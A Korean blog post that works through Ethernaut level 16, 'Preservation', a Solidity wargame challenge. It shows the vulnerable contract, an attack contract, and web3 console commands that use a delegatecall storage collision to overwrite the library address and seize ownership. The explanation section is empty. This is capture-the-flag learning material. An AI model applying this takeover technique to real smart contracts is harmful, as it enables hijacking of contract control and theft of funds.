본문 바로가기
블록체인/Ethernaut

[Ethernaut] 16. Preservation

dev_dean 2022. 6. 14. 10:21

소스코드

 

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Preservation {

  // public library contracts 
  address public timeZone1Library;
  address public timeZone2Library;
  address public owner; 
  uint storedTime;
  // Sets the function signature for delegatecall
  bytes4 constant setTimeSignature = bytes4(keccak256("setTime(uint256)"));

  constructor(address _timeZone1LibraryAddress, address _timeZone2LibraryAddress) public {
    timeZone1Library = _timeZone1LibraryAddress; 
    timeZone2Library = _timeZone2LibraryAddress; 
    owner = msg.sender;
  }
 
  // set the time for timezone 1
  function setFirstTime(uint _timeStamp) public {
    timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
  }

  // set the time for timezone 2
  function setSecondTime(uint _timeStamp) public {
    timeZone2Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
  }
}

// Simple library contract to set the time
contract LibraryContract {

  // stores a timestamp 
  uint storedTime;  

  function setTime(uint _time) public {
    storedTime = _time;
  }
}

 

 

목표

소유권 획득

 

방법

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract PreservationAttack {
  address public timeZone1Library;
  address public timeZone2Library;
  address public owner; 
  uint storedTime;

  function setTime(uint256 _time) public {
      owner = msg.sender;

  }
}

배포 후

콘솔 창에서

let storageData = []
let callbackFNConstructor = (index) => (error, contractData) => { storageData[index] = contractData}
for(let i =0; i < 6; i++) {
    web3.eth.getStorageAt(contract.address, i, callbackFNConstructor(i))
}
await contract.setFirstTime("deployed contract address")
for(let i =0; i < 6; i++) {
    web3.eth.getStorageAt(contract.address, i, callbackFNConstructor(i))
}
storageData // check the address of slot0
await contract.setFirstTime("123123")
await contract.owner() //check the owner.

 

해설

'블록체인 > Ethernaut' 카테고리의 다른 글

[Ethernaut] 18. MagicNumber  (0) 2022.06.19
[Ethernaut] 17. Recovery  (0) 2022.06.17
[Ethernaut] 15. Naught Coin  (0) 2022.06.13
[Ethernaut] 14. Gatekeeper Two  (0) 2022.06.10
[Ethernaut] 13. Gatekeeper One  (0) 2022.06.08

'블록체인/Ethernaut' Related Articles

티스토리툴바